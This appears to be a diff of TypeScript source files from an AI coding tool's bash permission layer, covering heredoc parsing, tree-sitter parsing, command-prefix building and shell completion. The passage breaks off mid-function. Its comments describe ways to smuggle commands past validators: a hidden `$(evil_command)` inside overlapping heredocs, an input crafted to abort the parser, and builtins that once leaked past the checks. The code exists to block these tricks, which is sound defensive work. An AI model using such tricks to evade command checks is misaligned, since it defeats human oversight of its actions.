    // Find the closing delimiter - must be on its own line
    // Security: Must match bash's exact behavior to prevent parsing discrepancies
    // that could allow command smuggling past permission checks.
    let closingLineIndex = -1
    for (let i = 0; i < contentLines.length; i++) {
      const line = contentLines[i]!

      if (isDash) {
        // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
        // The line after stripping leading tabs must be exactly the delimiter.
        const stripped = line.replace(/^\t*/, '')
        if (stripped === delimiter) {
          closingLineIndex = i
          break
        }
      } else {
        // << requires the closing delimiter to be exactly alone on the line
        // with NO leading or trailing whitespace. This matches bash behavior.
        if (line === delimiter) {
          closingLineIndex = i
          break
        }
      }

      // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
      // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
      // a line STARTS with the delimiter and contains the shell_eof_token
      // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
      // line matching, so this discrepancy could hide smuggled commands.
      //
      // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
      // >) after the delimiter, which could indicate command syntax from a
      // parsing discrepancy we haven't identified.
      //
      // For <<- heredocs, bash strips leading tabs before this check.
      const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
      if (
        eofCheckLine.length > delimiter.length &&
        eofCheckLine.startsWith(delimiter)
      ) {
        const charAfterDelimiter = eofCheckLine[delimiter.length]!
        if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
          // Shell metacharacter or substitution closer after delimiter —
          // bash may close the heredoc early here. Bail out.
          closingLineIndex = -1
          break
        }
      }
    }

    // Security: If quotedOnly mode is set and this is an unquoted heredoc,
    // record its content range for nesting/overlap checks but do NOT add it
    // to heredocMatches.
    //
    // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
    // unquoted heredoc has no closing delimiter, bash still treats everything
    // to end-of-input as the heredoc body (and expands $() within it). We
    // must block extraction of any subsequent quoted "heredoc" that falls
    // inside that unbounded body.
    if (options?.quotedOnly && !isQuotedOrEscaped) {
      let skipContentEndIndex: number
      if (closingLineIndex === -1) {
        // No closing delimiter — in bash, heredoc body extends to end of
        // input. Track the entire remaining range as "skipped body".
        skipContentEndIndex = command.length
      } else {
        const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
        const skipContentLength = skipLinesUpToClosing.join('\n').length
        skipContentEndIndex = contentStartIndex + 1 + skipContentLength
      }
      const skippedRange = {
        contentStartIndex,
        contentEndIndex: skipContentEndIndex,
      }
      skippedHeredocRanges.push(skippedRange)
      recognizedBodyRanges.push(skippedRange)
      continue
    }

    // If no closing delimiter found, this is malformed - skip it
    if (closingLineIndex === -1) {
      continue
    }

    // Calculate end position: contentStartIndex + 1 (newline) + length of
    // lines up to and including closing delimiter
    const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
    const contentLength = linesUpToClosing.join('\n').length
    const contentEndIndex = contentStartIndex + 1 + contentLength

    // Security: Bail if this heredoc's content range OVERLAPS with any
    // previously-skipped heredoc's content range. This catches the case where
    // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
    // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
    // share a line, their bodies appear SEQUENTIALLY (first's body, then
    // second's). Both compute contentStartIndex from the SAME newline, so the
    // second's body search walks through the first's body. For:
    //   cat <<EOF <<'SAFE'
    //   $(evil_command)
    //   EOF
    //   safe body
    //   SAFE
    // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
    // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
    // <<EOF's expansion) into the placeholder, hiding it from validators.
    //
    // The inside-a-body check above doesn't catch this because the quoted
    // operator's startIndex is on the command line BEFORE contentStart.
    // The contentStartPositions dedup check below doesn't catch it because the
    // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
    let overlapsSkipped = false
    for (const skipped of skippedHeredocRanges) {
      // Ranges [a,b) and [c,d) overlap iff a < d && c < b
      if (
        contentStartIndex < skipped.contentEndIndex &&
        skipped.contentStartIndex < contentEndIndex
      ) {
        overlapsSkipped = true
        break
      }
    }
    if (overlapsSkipped) {
      continue
    }

    // Build fullText: operator + newline + content (normalized form for restoration)
    const operatorText = command.slice(startIndex, operatorEndIndex)
    const contentText = command.slice(contentStartIndex, contentEndIndex)
    const fullText = operatorText + contentText

    heredocMatches.push({
      fullText,
      delimiter,
      operatorStartIndex: startIndex,
      operatorEndIndex,
      contentStartIndex,
      contentEndIndex,
    })
    // From here on the scanner and the `<<` search treat this body as opaque.
    recognizedBodyRanges.push({ contentStartIndex, contentEndIndex })
  }

  // If no valid heredocs found, return original
  if (heredocMatches.length === 0) {
    return { processedCommand: command, heredocs }
  }

  // Filter out nested heredocs - any heredoc whose operator starts inside
  // another heredoc's content range should be excluded. The loop above
  // already ignores `<<` inside recognised bodies; this is kept as a second
  // line of defense against corruption when heredoc content contains <<.
  const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
    for (const other of all) {
      if (candidate === other) continue
      if (
        candidate.operatorStartIndex > other.contentStartIndex &&
        candidate.operatorStartIndex < other.contentEndIndex
      ) {
        // This heredoc is nested inside another - filter it out
        return false
      }
    }
    return true
  })

  // If filtering removed all heredocs, return original
  if (topLevelHeredocs.length === 0) {
    return { processedCommand: command, heredocs }
  }

  // Check for multiple heredocs sharing the same content start position
  // (i.e., on the same line). This causes index corruption during replacement
  // because indices are calculated on the original string but applied to
  // a progressively modified string. Return without extraction - the fallback
  // is safe (requires manual approval or fails parsing).
  const contentStartPositions = new Set(
    topLevelHeredocs.map(h => h.contentStartIndex),
  )
  if (contentStartPositions.size < topLevelHeredocs.length) {
    return { processedCommand: command, heredocs }
  }

  // Sort by content end position descending so we can replace from end to start
  // (this preserves indices for earlier replacements)
  topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)

  // Generate a unique salt for this extraction to prevent placeholder collisions
  // with literal "__HEREDOC_N__" text in commands
  const salt = generatePlaceholderSalt()

  let processedCommand = command
  topLevelHeredocs.forEach((info, index) => {
    // Use reverse index since we sorted descending
    const placeholderIndex = topLevelHeredocs.length - 1 - index
    const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`

    heredocs.set(placeholder, info)

    // Replace heredoc with placeholder while preserving same-line content:
    // - Keep everything before the operator
    // - Replace operator with placeholder
    // - Keep content between operator and heredoc content (e.g., " && echo done")
    // - Remove the heredoc content (from newline through closing delimiter)
    // - Keep everything after the closing delimiter
    processedCommand =
      processedCommand.slice(0, info.operatorStartIndex) +
      placeholder +
      processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
      processedCommand.slice(info.contentEndIndex)
  })

  return { processedCommand, heredocs }
}
/**
 * Replaces every heredoc placeholder found in `text` with the original
 * heredoc text recorded for it. Internal helper used by restoreHeredocs.
 *
 * @param text - A string that may contain heredoc placeholders
 * @param heredocs - Map from placeholder to the heredoc it stands for
 * @returns `text` with each placeholder occurrence replaced by `fullText`
 */
function restoreHeredocsInString(
  text: string,
  heredocs: Map<string, HeredocInfo>,
): string {
  let result = text
  for (const [placeholder, info] of heredocs) {
    // Use a replacer function instead of a replacement string: in a
    // replacement string `$$`, `$&`, `` $` `` and `$'` are special patterns,
    // so heredoc text containing them (e.g. `echo $$`) would be restored
    // incorrectly. A function's return value is inserted verbatim.
    result = result.replaceAll(placeholder, () => info.fullText)
  }
  return result
}
/**
 * Puts the original heredoc text back into each string of `parts`.
 *
 * @param parts - Strings that may contain heredoc placeholders
 * @param heredocs - Placeholder map produced by `extractHeredocs`
 * @returns A new array with placeholders expanded; when `heredocs` is empty
 *   the input array itself is returned unchanged
 */
export function restoreHeredocs(
  parts: string[],
  heredocs: Map<string, HeredocInfo>,
): string[] {
  // Nothing was extracted, so there is nothing to substitute.
  return heredocs.size === 0
    ? parts
    : parts.map(segment => restoreHeredocsInString(segment, heredocs))
}
/**
 * Quick test for heredoc syntax in a command.
 *
 * Only checks that `HEREDOC_START_PATTERN` matches somewhere in the string;
 * it does not verify that the heredoc is well-formed or terminated.
 *
 * @param command - The shell command string
 * @returns true if the command appears to contain heredoc syntax
 */
export function containsHeredoc(command: string): boolean {
  const hasHeredocOperator = HEREDOC_START_PATTERN.test(command)
  return hasHeredocOperator
}
+230
View File
@@ -0,0 +1,230 @@
import { feature } from 'bun:bundle'
import { logEvent } from '../../services/analytics/index.js'
import { logForDebugging } from '../debug.js'
import {
ensureParserInitialized,
getParserModule,
type TsNode,
} from './bashParser.js'
/** Parse-tree node type, re-exported from the bash parser module. */
export type Node = TsNode
/** Result of parseCommand: the parse tree plus details of the first command found in it. */
export interface ParsedCommandData {
// Root of the tree returned by the parser for the whole command string
rootNode: Node
// Text of the variable assignments that precede the command name (e.g. `FOO=1`)
envVars: string[]
// First `command` / `declaration_command` node found in the tree, or null if none
commandNode: Node | null
// The command string exactly as it was passed to parseCommand
originalCommand: string
}
// Commands longer than this many characters are not parsed (the parse functions return null)
const MAX_COMMAND_LENGTH = 10000
// Keywords recognised as the leading child of a `declaration_command` node
const DECLARATION_COMMANDS = new Set([
'export',
'declare',
'typeset',
'readonly',
'local',
'unset',
'unsetenv',
])
// Child node types collected as arguments by extractCommandArguments
const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])
// Child node types at which extractCommandArguments stops collecting arguments
const SUBSTITUTION_TYPES = new Set([
'command_substitution',
'process_substitution',
])
// Node types that findCommandNode treats as a command
const COMMAND_TYPES = new Set(['command', 'declaration_command'])
// Set once the load outcome has been reported, so it is logged a single time.
let logged = false

/**
 * Reports whether the tree-sitter module loaded, to the debug log and to
 * analytics. Only the first call has any effect.
 *
 * @param success - true when the parser module was available
 */
function logLoadOnce(success: boolean): void {
  if (!logged) {
    logged = true
    const message = success
      ? 'tree-sitter: native module loaded'
      : 'tree-sitter: unavailable'
    logForDebugging(message)
    logEvent('tengu_tree_sitter_load', { success })
  }
}
/**
 * Awaits WASM init (Parser.init + Language.load). Must be called before
 * parseCommand/parseCommandRaw for the parser to be available. Idempotent.
 *
 * Does nothing unless the TREE_SITTER_BASH or TREE_SITTER_BASH_SHADOW build
 * feature is enabled.
 */
export async function ensureInitialized(): Promise<void> {
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
await ensureParserInitialized()
}
}
/**
 * Parses `command` with the tree-sitter bash parser and locates the first
 * command node in the resulting tree.
 *
 * @param command - Shell command string to parse
 * @returns The parse tree, the first command node (null when none is found)
 *   and that command's leading variable assignments. Returns null when the
 *   command is empty or longer than MAX_COMMAND_LENGTH, the TREE_SITTER_BASH
 *   feature is off, the parser module is unavailable, or parsing produced no
 *   tree or threw.
 */
export async function parseCommand(
command: string,
): Promise<ParsedCommandData | null> {
if (!command || command.length > MAX_COMMAND_LENGTH) return null
// Gate: ant-only until pentest. External builds fall back to legacy
// regex/shell-quote path. Guarding the whole body inside the positive
// branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
// only fire tengu_tree_sitter_load when a load was genuinely attempted.
if (feature('TREE_SITTER_BASH')) {
await ensureParserInitialized()
const mod = getParserModule()
logLoadOnce(mod !== null)
if (!mod) return null
try {
const rootNode = mod.parse(command)
if (!rootNode) return null
const commandNode = findCommandNode(rootNode, null)
const envVars = extractEnvVars(commandNode)
return { rootNode, envVars, commandNode, originalCommand: command }
} catch {
// Any parser exception is reported to the caller as "no parse" (null)
return null
}
}
return null
}
/**
 * SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
 * (timeout / node budget / Rust panic). Distinct from `null` (module not
 * loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
 * `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
 * Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
 */
export const PARSE_ABORTED = Symbol('parse-aborted')
/**
 * Raw parse — skips findCommandNode/extractEnvVars which the security
 * walker in ast.ts doesn't use. Saves one tree walk per bash command.
 *
 * Returns:
 * - Node: parse succeeded
 * - null: module not loaded / feature off / empty / over-length
 * - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
 *
 * Each abort is also reported through the `tengu_tree_sitter_parse_abort`
 * event, with `panic` telling a thrown exception apart from a null result.
 */
export async function parseCommandRaw(
command: string,
): Promise<Node | null | typeof PARSE_ABORTED> {
if (!command || command.length > MAX_COMMAND_LENGTH) return null
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
await ensureParserInitialized()
const mod = getParserModule()
logLoadOnce(mod !== null)
// Module unavailable: this is the "not loaded" case (null), not an abort
if (!mod) return null
try {
const result = mod.parse(command)
// SECURITY: Module loaded; null here = timeout/node-budget abort in
// bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
// Previously collapsed into `return null` → parse-unavailable → legacy
// path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
if (result === null) {
logEvent('tengu_tree_sitter_parse_abort', {
cmdLength: command.length,
panic: false,
})
return PARSE_ABORTED
}
return result
} catch {
// An exception from the parser is also an abort, flagged with panic: true
logEvent('tengu_tree_sitter_parse_abort', {
cmdLength: command.length,
panic: true,
})
return PARSE_ABORTED
}
}
return null
}
/**
 * Depth-first search for the first command node at or below `node`.
 *
 * @param node - Node to inspect
 * @param parent - Parent of `node`, or null at the root
 * @returns The first node whose type is in COMMAND_TYPES, or null if none
 */
function findCommandNode(node: Node, parent: Node | null): Node | null {
  if (COMMAND_TYPES.has(node.type)) return node

  switch (node.type) {
    case 'variable_assignment':
      // Assignment followed by a command: the command is a later sibling.
      if (parent) {
        const followingCommand = parent.children.find(
          sibling =>
            COMMAND_TYPES.has(sibling.type) &&
            sibling.startIndex > node.startIndex,
        )
        return followingCommand ?? null
      }
      break
    case 'redirected_statement': {
      // Only the statement's direct children are considered here.
      const innerCommand = node.children.find(child =>
        COMMAND_TYPES.has(child.type),
      )
      return innerCommand ?? null
    }
  }

  // Everything else (pipelines included): first hit among the children wins.
  for (const child of node.children) {
    const found = findCommandNode(child, node)
    if (found) return found
  }
  return null
}
/**
 * Collects the variable assignments that precede the command name.
 *
 * @param commandNode - Candidate command node (may be null)
 * @returns Text of each leading `variable_assignment` child, in order; empty
 *   when the node is null or is not of type `command`
 */
function extractEnvVars(commandNode: Node | null): string[] {
  if (!commandNode || commandNode.type !== 'command') return []

  const assignments: string[] = []
  for (const child of commandNode.children) {
    const kind = child.type
    // The command name ends the leading-assignment section.
    if (kind === 'command_name' || kind === 'word') break
    if (kind === 'variable_assignment') assignments.push(child.text)
  }
  return assignments
}
/**
 * Builds the argv-style word list for a command node.
 *
 * For a `declaration_command` the result is just the declaration keyword
 * (when it is one of DECLARATION_COMMANDS), otherwise empty. For other nodes
 * the result is the command name followed by its arguments with surrounding
 * quotes stripped; variable assignments are skipped and collection stops at
 * the first command/process substitution.
 *
 * @param commandNode - The command node to read
 * @returns Command name followed by its arguments
 */
export function extractCommandArguments(commandNode: Node): string[] {
  if (commandNode.type === 'declaration_command') {
    const keyword = commandNode.children[0]
    if (keyword && DECLARATION_COMMANDS.has(keyword.text)) {
      return [keyword.text]
    }
    return []
  }

  const collected: string[] = []
  let nameSeen = false
  for (const child of commandNode.children) {
    const kind = child.type
    if (kind === 'variable_assignment') continue

    // The command name: an explicit command_name, or the first bare word.
    const isCommandName =
      kind === 'command_name' || (!nameSeen && kind === 'word')
    if (isCommandName) {
      nameSeen = true
      collected.push(child.text)
      continue
    }

    if (SUBSTITUTION_TYPES.has(kind)) break
    if (ARGUMENT_TYPES.has(kind)) collected.push(stripQuotes(child.text))
  }
  return collected
}
/**
 * Removes one pair of matching surrounding quotes (`"…"` or `'…'`).
 *
 * @param text - Raw argument text
 * @returns The text without its outer quotes, or unchanged if it is not
 *   wrapped in a matching pair
 */
function stripQuotes(text: string): string {
  if (text.length < 2) return text
  const opening = text[0]
  const closing = text[text.length - 1]
  const isQuoted = (opening === '"' || opening === "'") && opening === closing
  return isQuoted ? text.slice(1, -1) : text
}
+204
View File
@@ -0,0 +1,204 @@
import { buildPrefix } from '../shell/specPrefix.js'
import { splitCommand_DEPRECATED } from './commands.js'
import { extractCommandArguments, parseCommand } from './parser.js'
import { getCommandSpec } from './registry.js'
// Matches an argument made up solely of digits
const NUMERIC = /^\d+$/
// Matches an argument that starts with a NAME= variable assignment
const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/
// Wrapper commands with complex option handling that can't be expressed in specs
const WRAPPER_COMMANDS = new Set([
'nice', // command position varies based on options
])
/** Wraps a single value in an array; an array is returned as-is (same reference). */
const toArray = <T>(val: T | T[]): T[] => {
  if (Array.isArray(val)) return val
  return [val]
}
/**
 * Tells whether `arg` names one of the spec's subcommands. Used to
 * disambiguate wrapper commands that also have subcommands (e.g. the git spec
 * has isCommand args for aliases).
 *
 * @param arg - Candidate subcommand name
 * @param spec - Command spec, or null when none is known
 * @returns true when a subcommand's name (or one of its names) equals `arg`
 */
function isKnownSubcommand(
  arg: string,
  spec: { subcommands?: { name: string | string[] }[] } | null,
): boolean {
  const subcommands = spec?.subcommands
  if (!subcommands?.length) return false

  for (const { name } of subcommands) {
    const matches = Array.isArray(name) ? name.includes(arg) : name === arg
    if (matches) return true
  }
  return false
}
/**
 * Computes the prefix for a single command.
 *
 * @param command - The command string to analyse
 * @param recursionDepth - Nesting depth of recursive calls (gives up above 10)
 * @param wrapperCount - Number of wrapper commands unwrapped so far (gives up
 *   above 2)
 * @returns `null` when a limit is exceeded, the command cannot be parsed, or a
 *   top-level wrapper yields no prefix; otherwise an object whose
 *   `commandPrefix` is the prefix (with leading variable assignments
 *   prepended) or null when no prefix could be built
 */
export async function getCommandPrefixStatic(
  command: string,
  recursionDepth = 0,
  wrapperCount = 0,
): Promise<{ commandPrefix: string | null } | null> {
  if (wrapperCount > 2 || recursionDepth > 10) return null

  const parsed = await parseCommand(command)
  if (!parsed) return null

  const { envVars, commandNode } = parsed
  if (!commandNode) return { commandPrefix: null }

  const [cmd, ...args] = extractCommandArguments(commandNode)
  if (!cmd) return { commandPrefix: null }

  const spec = await getCommandSpec(cmd)

  // A wrapper is either hard-coded or has an argument marked isCommand...
  const looksLikeWrapper =
    WRAPPER_COMMANDS.has(cmd) ||
    (spec?.args && toArray(spec.args).some(arg => arg?.isCommand))
  // ...unless its first argument is one of its own subcommands, in which case
  // it is handled as a regular command.
  const firstArg = args[0]
  const isWrapper =
    Boolean(looksLikeWrapper) &&
    !(firstArg && isKnownSubcommand(firstArg, spec))

  const prefix = isWrapper
    ? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
    : await buildPrefix(cmd, args, spec)

  if (prefix === null && isWrapper && recursionDepth === 0) return null
  if (!prefix) return { commandPrefix: null }

  const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
  return { commandPrefix: envPrefix + prefix }
}
/**
 * Builds the prefix for a wrapper command by recursing into the command it
 * wraps.
 *
 * First tries the position given by the spec's `isCommand` argument; if that
 * yields nothing, falls back to the first argument that is not an option, a
 * number or a NAME= assignment.
 *
 * @param command - The wrapper command name
 * @param args - The wrapper's arguments
 * @param recursionDepth - Current recursion depth
 * @param wrapperCount - Number of wrappers unwrapped so far
 * @returns The combined prefix, the bare wrapper name when no wrapped command
 *   is found, or null when the wrapped command yields no prefix
 */
async function handleWrapper(
  command: string,
  args: string[],
  recursionDepth: number,
  wrapperCount: number,
): Promise<string | null> {
  const spec = await getCommandSpec(command)
  const commandArgIndex = spec?.args
    ? toArray(spec.args).findIndex(arg => arg?.isCommand)
    : -1

  // Spec-driven path: only usable when the command slot is actually present.
  if (commandArgIndex !== -1 && commandArgIndex < args.length) {
    const nested = await getCommandPrefixStatic(
      args.slice(commandArgIndex).join(' '),
      recursionDepth + 1,
      wrapperCount + 1,
    )
    if (nested?.commandPrefix) {
      // Keep the positional arguments that come before the command slot.
      const leading = args
        .slice(0, commandArgIndex)
        .filter(arg => arg && !arg.startsWith('-') && !ENV_VAR.test(arg))
      return [command, ...leading, ...nested.commandPrefix.split(' ')].join(
        ' ',
      )
    }
  }

  // Heuristic path: the first argument that could be a command name.
  const wrappedIndex = args.findIndex(
    arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
  )
  const wrapped = args[wrappedIndex]
  if (!wrapped) return command

  const result = await getCommandPrefixStatic(
    args.slice(wrappedIndex).join(' '),
    recursionDepth + 1,
    wrapperCount + 1,
  )
  return result?.commandPrefix ? `${command} ${result.commandPrefix}` : null
}
/**
 * Computes prefixes for a compound command (with && / || / ;).
 * A single command yields a one-element array holding its prefix (or an
 * empty array when it has none).
 *
 * For compound commands a prefix is computed per subcommand; prefixes that
 * share a root (first word) are then collapsed to their word-aligned longest
 * common prefix. Results keep the order in which each root first appeared.
 *
 * @param command - The full command string
 * @param excludeSubcommand - Optional filter; return true for subcommands
 *   that should be left out of the suggestion (e.g. read-only commands that
 *   are already auto-allowed)
 * @returns One collapsed prefix per distinct root command
 */
export async function getCompoundCommandPrefixesStatic(
  command: string,
  excludeSubcommand?: (subcommand: string) => boolean,
): Promise<string[]> {
  const subcommands = splitCommand_DEPRECATED(command)
  if (subcommands.length <= 1) {
    const single = await getCommandPrefixStatic(command)
    return single?.commandPrefix ? [single.commandPrefix] : []
  }

  // Prefixes grouped by root command; a Map keeps first-seen order.
  const byRoot = new Map<string, string[]>()
  for (const raw of subcommands) {
    const subcommand = raw.trim()
    if (excludeSubcommand?.(subcommand)) continue

    const prefix = (await getCommandPrefixStatic(subcommand))?.commandPrefix
    if (!prefix) continue

    const root = prefix.split(' ')[0]!
    const sameRoot = byRoot.get(root)
    if (sameRoot) {
      sameRoot.push(prefix)
    } else {
      byRoot.set(root, [prefix])
    }
  }

  return [...byRoot.values()].map(group => longestCommonPrefix(group))
}
/**
 * Longest common prefix of the given strings, measured in whole
 * space-separated words. At least the first word of the first string is
 * always kept.
 * e.g. ["git fetch", "git worktree"] → "git"
 *      ["npm run test", "npm run lint"] → "npm run"
 *
 * @param strings - Strings to compare
 * @returns The shared leading words joined by spaces; '' for an empty list
 */
function longestCommonPrefix(strings: string[]): string {
  if (strings.length === 0) return ''
  const [first, ...others] = strings
  if (others.length === 0) return first!

  const words = first!.split(' ')
  let commonWords = words.length
  for (const other of others) {
    const otherWords = other.split(' ')
    const limit = Math.min(commonWords, otherWords.length)
    let shared = 0
    while (shared < limit && words[shared] === otherWords[shared]) {
      shared++
    }
    commonWords = shared
  }
  return words.slice(0, Math.max(1, commonWords)).join(' ')
}
+53
View File
@@ -0,0 +1,53 @@
import { memoizeWithLRU } from '../memoize.js'
import specs from './specs/index.js'
/** Description of a command: its name plus optional subcommands, positional arguments and options. */
export type CommandSpec = {
name: string
description?: string
subcommands?: CommandSpec[]
args?: Argument | Argument[]
options?: Option[]
}
/** Description of one positional argument of a command or option. */
export type Argument = {
name?: string
description?: string
isDangerous?: boolean
isVariadic?: boolean // repeats infinitely e.g. echo hello world
isOptional?: boolean
isCommand?: boolean // wrapper commands e.g. timeout, sudo
isModule?: string | boolean // for python -m and similar module args
isScript?: boolean // script files e.g. node script.js
}
/** Description of a command-line option; `name` may list several spellings. */
export type Option = {
name: string | string[]
description?: string
args?: Argument | Argument[]
isRequired?: boolean
}
/**
 * Loads the spec for `command` from the `@withfig/autocomplete` package.
 *
 * Names that are empty, contain a path separator or `..`, or start with `-`
 * (other than the bare `-`) are rejected before any import is attempted.
 *
 * @param command - Command name to look up
 * @returns The module's default export (or the module itself), or null when
 *   the name is rejected or the import fails
 */
export async function loadFigSpec(
  command: string,
): Promise<CommandSpec | null> {
  const isRejected =
    !command ||
    command.includes('/') ||
    command.includes('\\') ||
    command.includes('..') ||
    (command !== '-' && command.startsWith('-'))
  if (isRejected) return null

  try {
    const loaded = await import(`@withfig/autocomplete/build/${command}.js`)
    return loaded.default || loaded
  } catch {
    // Missing or unloadable spec: treated the same as "no spec".
    return null
  }
}
/**
 * Looks up the spec for a command, memoized per command name.
 * Bundled specs take precedence; otherwise the spec is loaded via
 * loadFigSpec. Resolves to null when neither source has one.
 */
export const getCommandSpec = memoizeWithLRU(
  async (command: string): Promise<CommandSpec | null> => {
    const bundled = specs.find(s => s.name === command)
    if (bundled) return bundled
    return (await loadFigSpec(command)) || null
  },
  (command: string) => command,
)
+259
View File
@@ -0,0 +1,259 @@
import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
import {
type ParseEntry,
quote,
tryParseShellCommand,
} from '../bash/shellQuote.js'
import { logForDebugging } from '../debug.js'
import { getShellType } from '../localInstaller.js'
import * as Shell from '../Shell.js'
// Constants
// Upper bound on the number of completion suggestions produced
const MAX_SHELL_COMPLETIONS = 15
// Timeout (ms) passed to Shell.exec when running the completion command
const SHELL_COMPLETION_TIMEOUT_MS = 1000
// Operators after which a new command is expected
const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const
/** The kind of thing being completed at the cursor. */
export type ShellCompletionType = 'command' | 'variable' | 'file'
/** Completion context derived from the input: the text to complete and what kind of completion applies. */
type InputContext = {
prefix: string
completionType: ShellCompletionType
}
/**
 * Tells whether a parsed token is an operator entry whose `op` is one of
 * COMMAND_OPERATORS (|, ||, &&, ;).
 */
function isCommandOperator(token: ParseEntry): boolean {
  if (typeof token !== 'object' || token === null || !('op' in token)) {
    return false
  }
  return (COMMAND_OPERATORS as readonly string[]).includes(token.op as string)
}
/**
 * Classifies a prefix by its shape alone: `$…` is a variable; anything
 * containing `/` or starting with `~` or `.` is a file; everything else is a
 * command.
 */
function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
  if (prefix.startsWith('$')) return 'variable'

  const firstChar = prefix[0]
  const looksLikePath =
    prefix.includes('/') || firstChar === '~' || firstChar === '.'
  return looksLikePath ? 'file' : 'command'
}
/**
 * Scans the parsed tokens from the end and returns the last one that is a
 * plain string, together with its position; null when there is none.
 */
function findLastStringToken(
  tokens: ParseEntry[],
): { token: string; index: number } | null {
  for (let index = tokens.length - 1; index >= 0; index--) {
    const token = tokens[index]
    if (typeof token === 'string') return { token, index }
  }
  return null
}
/**
 * Tells whether the token at `currentTokenIndex` sits where a new command is
 * expected: at the very start of the input, or directly after a command
 * operator.
 */
function isNewCommandContext(
  tokens: ParseEntry[],
  currentTokenIndex: number,
): boolean {
  if (currentTokenIndex === 0) return true

  const previous = tokens[currentTokenIndex - 1]
  return previous === undefined ? false : isCommandOperator(previous)
}
/**
 * Works out what should be completed at the cursor.
 *
 * @param input - The full input line
 * @param cursorOffset - Cursor position; only the text before it is examined
 * @returns The prefix to complete and the kind of completion to run
 */
function parseInputContext(input: string, cursorOffset: number): InputContext {
  const beforeCursor = input.slice(0, cursorOffset)

  // Detect a trailing $NAME first, before shell-quote gets a chance to
  // expand it.
  const varMatch = /\$[a-zA-Z_][a-zA-Z0-9_]*$/.exec(beforeCursor)
  if (varMatch) {
    return { prefix: varMatch[0], completionType: 'variable' }
  }

  const parseResult = tryParseShellCommand(beforeCursor)
  if (!parseResult.success) {
    // shell-quote could not parse the text: fall back to whitespace splitting.
    const words = beforeCursor.split(/\s+/)
    const prefix = words[words.length - 1] || ''
    const isFirstToken = words.length === 1 && !beforeCursor.includes(' ')
    return {
      prefix,
      completionType: isFirstToken
        ? 'command'
        : getCompletionTypeFromPrefix(prefix),
    }
  }

  const { tokens } = parseResult
  const lastToken = findLastStringToken(tokens)
  if (!lastToken) {
    // No word yet (empty input or only operators): a command is expected.
    return { prefix: '', completionType: 'command' }
  }

  // A trailing space means a new argument is being started; it is treated as
  // a file argument with an empty prefix.
  if (beforeCursor.endsWith(' ')) {
    return { prefix: '', completionType: 'file' }
  }

  const prefix = lastToken.token
  const baseType = getCompletionTypeFromPrefix(prefix)
  if (baseType !== 'command') {
    // The prefix itself clearly marks a variable or a path.
    return { prefix, completionType: baseType }
  }

  // Command-like word: it is a command only where a new command can start,
  // otherwise it is an argument and completed as a file.
  const startsCommand = isNewCommandContext(tokens, lastToken.index)
  return { prefix, completionType: startsCommand ? 'command' : 'file' }
}
/**
 * Builds the bash `compgen` command line that lists completions for `prefix`.
 *
 * @param prefix - Text to complete (includes the leading `$` for variables)
 * @param completionType - Kind of completion to generate
 * @returns A shell command string whose stdout is one completion per line
 */
function getBashCompletionCommand(
  prefix: string,
  completionType: ShellCompletionType,
): string {
  switch (completionType) {
    case 'variable': {
      // compgen -v expects the bare name, so drop the leading $.
      const varName = prefix.slice(1)
      return `compgen -v ${quote([varName])} 2>/dev/null`
    }
    case 'file':
      // Directories get a trailing slash, files a trailing space. Names are
      // consumed with 'while read' to prevent command injection from
      // filenames containing newlines.
      return `compgen -f ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
    default:
      return `compgen -c ${quote([prefix])} 2>/dev/null`
  }
}
/**
 * Builds the zsh command line that lists completions for `prefix`, using
 * native zsh facilities.
 *
 * @param prefix - Text to complete (includes the leading `$` for variables)
 * @param completionType - Kind of completion to generate
 * @returns A shell command string whose stdout is one completion per line
 */
function getZshCompletionCommand(
  prefix: string,
  completionType: ShellCompletionType,
): string {
  switch (completionType) {
    case 'variable': {
      // Filter the parameters table by pattern; the leading $ is not part of
      // the name.
      const varName = prefix.slice(1)
      return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
    }
    case 'file':
      // Directories get a trailing slash, files a trailing space.
      // Note: zsh glob expansion is safe from command injection (unlike bash
      // for-in loops).
      return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
    default:
